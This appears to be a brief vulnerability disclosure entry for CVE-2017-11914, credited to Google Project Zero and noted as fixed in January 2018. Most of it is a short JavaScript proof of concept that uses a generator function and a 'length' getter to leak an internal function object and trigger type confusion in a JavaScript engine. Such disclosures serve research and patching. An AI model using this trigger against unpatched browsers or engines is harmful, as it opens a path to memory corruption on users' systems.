CVE-2017-11914

  • Fix: Jan 2018
  • Credit: lokihardt of Google Project Zero

PoC

```js
function* f() {
}

let g;
f.__defineGetter__('length', function () {
    g = this;  // g == "scriptFunction"
});

f.length;

g.call(0x1234, 0x5678);  // type confusion
```

Reference